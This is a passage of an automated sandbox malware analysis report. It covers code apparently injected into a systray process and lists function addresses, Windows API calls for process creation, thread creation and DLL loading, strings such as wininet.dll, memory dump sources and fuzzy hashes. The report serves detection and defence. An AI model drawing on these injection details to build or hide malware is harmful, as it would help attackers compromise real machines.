Instruction Fuzzy Hash: F8D01776200214BBD710EB98DC85EA77BADEF48760F154499BA1C9B282C530FA008AE0

Uniqueness

Uniqueness Score: -1.00%

Function 02D1A47C Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02D14D40,?,?,02D14D40,00000000,FFFFFFFF), ref: 02D1A4A5

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 594407e538b1f9566720a9a90d53dc7d757fc1ab6a3dc681645b6378f76722ac
Instruction ID: db560b514274d991ff86fef5313a1887d5f10783c00d6554f01cd4e4b2cfc0a4
Opcode Fuzzy Hash: 594407e538b1f9566720a9a90d53dc7d757fc1ab6a3dc681645b6378f76722ac
Instruction Fuzzy Hash: 81E0C2722402007FD710EBD4CC45F977768EF44720F044494BA2C9B241C130EA00C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2CAA

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cad2d157d1e6751325728a876b3668651be609e39b53e6a139b29ad03fdbc03c
Instruction ID: a67d49f40ae3f42f97ffba35c4a9def4120cb421ec5f41292fc8c4e6cc315b92
Opcode Fuzzy Hash: cad2d157d1e6751325728a876b3668651be609e39b53e6a139b29ad03fdbc03c
Instruction Fuzzy Hash: C990023120180442F2007598540874600158BE0305F55D011B50257A9EC665D9917131

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2C6A

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ab842d349ae8b8a43137ab9275d7c417e2b2b760d76e8b23284f4db3380a0f2
Instruction ID: c055f587a261cca64786cce60e3dcd10e79e1cc27a1b3b9b3538ff6e1709690f
Opcode Fuzzy Hash: 2ab842d349ae8b8a43137ab9275d7c417e2b2b760d76e8b23284f4db3380a0f2
Instruction Fuzzy Hash: 6990023120180882F20071584404B4600158BE0305F55C016B01257A8D8615D9517521

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2C7A

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bbc464c21b4cd3648ea77b298b3ca4f0b80f08f719b598ab34adf3c18724a8ba
Instruction ID: 7c1ff31da75bf5a1b50863846ff4422f2f829655e4c32a5572f9b884211ed1c8
Opcode Fuzzy Hash: bbc464c21b4cd3648ea77b298b3ca4f0b80f08f719b598ab34adf3c18724a8ba
Instruction Fuzzy Hash: 9190023120188842F2107158840474A00158BD0305F59C411B44257ACD8695D9917121

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2DDA

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0a032b3e4837fc6d833bd9b533a4f55eeccac268f222c76bfd161b7b7eff1977
Instruction ID: bb2964115a2e787e35826c85e7a4a4764fa18c15c7a36337023d552f67ccb3ca
Opcode Fuzzy Hash: 0a032b3e4837fc6d833bd9b533a4f55eeccac268f222c76bfd161b7b7eff1977
Instruction Fuzzy Hash: AD900221242841927645B158440460740169BE0245795C012B1415BA4C8526E956E621

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2DFA

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a597123cd0e3da110d7f68d87f38e574099e444e4850e96774553ad89d860c19
Instruction ID: db5f5c0730b142495de8a17d0598306b3e0507acb4d745df603ed244ba82a1d5
Opcode Fuzzy Hash: a597123cd0e3da110d7f68d87f38e574099e444e4850e96774553ad89d860c19
Instruction Fuzzy Hash: E790023120180453F2117158450470700198BD0245F95C412B04257ACD9656DA52B121

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2D1A

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c0719a6545358dc19fcfb88aef3bf364856a00b7f52d9bc0a3c0efa40b79e43e
Instruction ID: aa4d9e013b21e2aac356a1c5c5c87c3aaea79c38020e22c2cdb972856753c4e9
Opcode Fuzzy Hash: c0719a6545358dc19fcfb88aef3bf364856a00b7f52d9bc0a3c0efa40b79e43e
Instruction Fuzzy Hash: B390022921380042F2807158540870A00158BD1206F95D415B00167ACCC915D9696321

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2EAA

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 434118f6801fd743fc2a244d7a3cdbb27c4714a422cdf3370e574d0cbddd805d
Instruction ID: 8eb0abc5ef30fc6265280be6b84813ee8dd63d17e5878807848cd78b07597898
Opcode Fuzzy Hash: 434118f6801fd743fc2a244d7a3cdbb27c4714a422cdf3370e574d0cbddd805d
Instruction Fuzzy Hash: 7390027120180442F2407158440474600158BD0305F55C011B50657A8E8659DED57665

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2FEA

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4994d3940b1c89adfe7947a7e39f37d46ec311c579123323b5c534d4d11b4536
Instruction ID: 0489fdaf3834d3d6380885c73666489789ead80b4d2cff6e2031831b90e471a3
Opcode Fuzzy Hash: 4994d3940b1c89adfe7947a7e39f37d46ec311c579123323b5c534d4d11b4536
Instruction Fuzzy Hash: 7E900221211C0082F30075684C14B0700158BD0307F55C115B01557A8CC915D9616521

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2F3A

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 923cf47ff4789abf966886f86de803ab5ff9519bac52b83d55b35aee2ee153ce
Instruction ID: 002f93877fc08266e5d1cafaf259c32467cd442714c0aede44df1596273bfe90
Opcode Fuzzy Hash: 923cf47ff4789abf966886f86de803ab5ff9519bac52b83d55b35aee2ee153ce
Instruction Fuzzy Hash: 5D90026134180482F20071584414B060015CBE1305F55C015F10657A8D8619DD527126

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2ADA

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6e0369f26a8f4cb7509d64353a6391326be871613e29a6e294d257e07b8c5b6f
Instruction ID: e254a2984fba97ad2d011269b6a2056c159bfd3f9848230ac2ce54f3164e9de8
Opcode Fuzzy Hash: 6e0369f26a8f4cb7509d64353a6391326be871613e29a6e294d257e07b8c5b6f
Instruction Fuzzy Hash: BD900225211800432205B558070460700568BD5355355C021F10167A4CD621D9616121

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2BEA

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0ab1139cabdff37981711a05e8616be824202f646e931e6019ad1b76079a5d0c
Instruction ID: 6936d486bfdd80e03389b55fecbb4a0561fe55d729cb10915e20db36f7eab3f1
Opcode Fuzzy Hash: 0ab1139cabdff37981711a05e8616be824202f646e931e6019ad1b76079a5d0c
Instruction Fuzzy Hash: 5190023120584882F24071584404B4600258BD0309F55C011B00657E8D9625DE55B661

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2BFA

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d68aee0bee843c213ed35da9c55dd7d0f2a79f008ece3e089ba4fa1055ea34f1
Instruction ID: 446626967acd2366cbe4b91106bf472cd0f02318aa6c1d160230f0ba403d300a
Opcode Fuzzy Hash: d68aee0bee843c213ed35da9c55dd7d0f2a79f008ece3e089ba4fa1055ea34f1
Instruction Fuzzy Hash: 2A90023120180842F2807158440474A00158BD1305F95C015B00267A8DCA15DB5977A1

Uniqueness

Uniqueness Score: -1.00%

Function 04CF2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF2B6A

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3ebddd25f4c38799794823ddad13f516e24a388608bd2e6b4f5cd306d63f36df
Instruction ID: b89428d2f7d15ebd010d5bdc964d29aa6319f37c8801b7cbe64400244b938b4b
Opcode Fuzzy Hash: 3ebddd25f4c38799794823ddad13f516e24a388608bd2e6b4f5cd306d63f36df
Instruction Fuzzy Hash: 5F90026120280043620571584414716401A8BE0205B55C021F10157E4DC525D9917125

Uniqueness

Uniqueness Score: -1.00%

Function 04CF35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04CF35CA

Memory Dump Source

Source File: 00000007.00000002.3885268113.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000007.00000002.3885268113.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3885268113.0000000004E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4c80000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 72a2945cedcfb5bae48ea0b3c27de3efff9c865076907e6a31d2cf3ff6acd66f
Instruction ID: cdd719653258214fca245bb8f5857bd6844fba96ba10640bb0e7ed19eeb91dee
Opcode Fuzzy Hash: 72a2945cedcfb5bae48ea0b3c27de3efff9c865076907e6a31d2cf3ff6acd66f
Instruction Fuzzy Hash: 6D90023160590442F2007158451470610158BD0205F65C411B04257BCD8795DA5175A2

Uniqueness

Uniqueness Score: -1.00%

Function 02D19070 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 02D19118

Strings

net.dll, xrefs: 02D190E1, 02D19167, 02D1913F, 02D1914B, 02D19173
wininet.dll, xrefs: 02D190CE, 02D190D7

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 63544d63867e708e1faaf78ebc484f48dacde3a693dafda3e76a5f8c98e06fb1
Instruction ID: 296e6fc5989ffa04bee114f8b2ce7e3549916f0b2a336a0ee23c6a645a3f4ebe
Opcode Fuzzy Hash: 63544d63867e708e1faaf78ebc484f48dacde3a693dafda3e76a5f8c98e06fb1
Instruction Fuzzy Hash: 1A3192B2A00704BBC714DF64D895FA7B7B9FB48704F00841DF62A9B745D730A990CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D19066 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 02D19118

Strings

net.dll, xrefs: 02D190E1, 02D1913F, 02D1914B
wininet.dll, xrefs: 02D190CE, 02D190D7

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 729fe682efe5728c2841d965815c6af81b50c465cbb92764371d1af27dedde08
Instruction ID: 028ce08874d6d55709d7239829ff1667e28fd47be6e4e96a83e75e43770e80e4
Opcode Fuzzy Hash: 729fe682efe5728c2841d965815c6af81b50c465cbb92764371d1af27dedde08
Instruction Fuzzy Hash: E621D3B2A00304BBC714DF64D895FA7B7B9FB88B04F10806DE62D6B745D774A990CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D1A660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02D03AF8), ref: 02D1A68D

Strings

.z`, xrefs: 02D1A67C, 02D1A688

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 13be10698d3b32098bb0669d8397b7aa3cb922286f032bfa669dec162d7d322c
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 89E01AB12002046BD714DF59DC44EA777ADEF88750F014554B91C57241C630E910CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 02D1A693 Relevance: 3.1, APIs: 2, Instructions: 71
memoryprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(02D14526,?,02D14C9F,02D14C9F,?,02D14526,?,?,?,?,?,00000000,00000000,?), ref: 02D1A64D
CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D1A724

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: AllocateCreateHeapInternalProcess
String ID:
API String ID: 2739015735-0
Opcode ID: 5b025f88ea3bda87434fa5d71af327bfb2fa51a71bf5852b116d0f3eb41bb745
Instruction ID: 7871b7b81bffe7516d621aa77634c48a599aef687dc66514d8bc97016a8c7451
Opcode Fuzzy Hash: 5b025f88ea3bda87434fa5d71af327bfb2fa51a71bf5852b116d0f3eb41bb745
Instruction Fuzzy Hash: C2117CB6204248AFCB14DFA8EC80DEB77A9EF88354F118649F95C97642D230E915CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 02D0830A Relevance: 3.1, APIs: 2, Instructions: 62
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D0836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D0838B

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: a537377ecf182b2fc080ada04841690dc36ee8b9f89dc4df97134160b96f0336
Instruction ID: 980c6f7a1a95902c7b2973908b4950aad875e0ddec363e349c8a297a0513c563
Opcode Fuzzy Hash: a537377ecf182b2fc080ada04841690dc36ee8b9f89dc4df97134160b96f0336
Instruction Fuzzy Hash: A0016D31A8031877E720A6A49C42FFE7B5CEB40B65F050219FF04FA2C0E6906D0547F2

Uniqueness

Uniqueness Score: -1.00%

Function 02D08310 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D0836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D0838B

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction ID: d398a77994dd978c694459fd00d3229bf19d4823f252c3f15d9cf14ff28974e8
Opcode Fuzzy Hash: 3172d27be0b016439e5481d8b21c313a41ffbcab7864ad54bb0489d0eefa33a4
Instruction Fuzzy Hash: 5E01A271A8032877E720A6949C42FBE7B6DAB40B51F050119FF04FA2C1E6A46D064AF6

Uniqueness

Uniqueness Score: -1.00%

Function 02D0ACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02D0AD52

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: 5c7486b2481488ee22b3b509f8f24ec3366634ea6caae0a7683ef8f12fc362c2
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: A8011EB5D4020DBBDB10EBA4EC81F9DB3799B54308F108195EA1897691FA71EB14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D1A6D0 Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D1A724

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 5634c860641a18d7dcfee9ee7e6547cfa96c235a4beba38ad5e7fa8a2dd32884
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 3501AFB2214108BFCB54DF89DC80EEB77ADAF8C754F158258BA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02D191A0 Relevance: 1.5, APIs: 1, Instructions: 36
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D0F040,?,?,00000000), ref: 02D191DC

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 99fcb9b7b30df4d86e90b5a4a83c6d9f27f324d9dc8e82fa5e5eb4eedb0108d3
Instruction ID: 05eb47d60007443647e3d7ef5c60f22c137b7ac696d90f5bbaec0cc953bae541
Opcode Fuzzy Hash: 99fcb9b7b30df4d86e90b5a4a83c6d9f27f324d9dc8e82fa5e5eb4eedb0108d3
Instruction Fuzzy Hash: 25E06D773903043AE7206599AC02FA7B79CCB81B20F140026FA0DEB6C1D595F84146A4

Uniqueness

Uniqueness Score: -1.00%

Function 02D19193 Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02D0F040,?,?,00000000), ref: 02D191DC

Memory Dump Source

Source File: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2d00000_systray.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 1a206c8d9fcdfea0510d65a40b9c2929398dddbd67c1927ca782344703e3b693
Instruction ID: d8a76bfb58d8f992603d20ee0beae535c64492bc1048a8726db551a670521f9c
Opcode Fuzzy Hash: 1a206c8d9fcdfea0510d65a40b9c2929398dddbd67c1927ca782344703e3b693
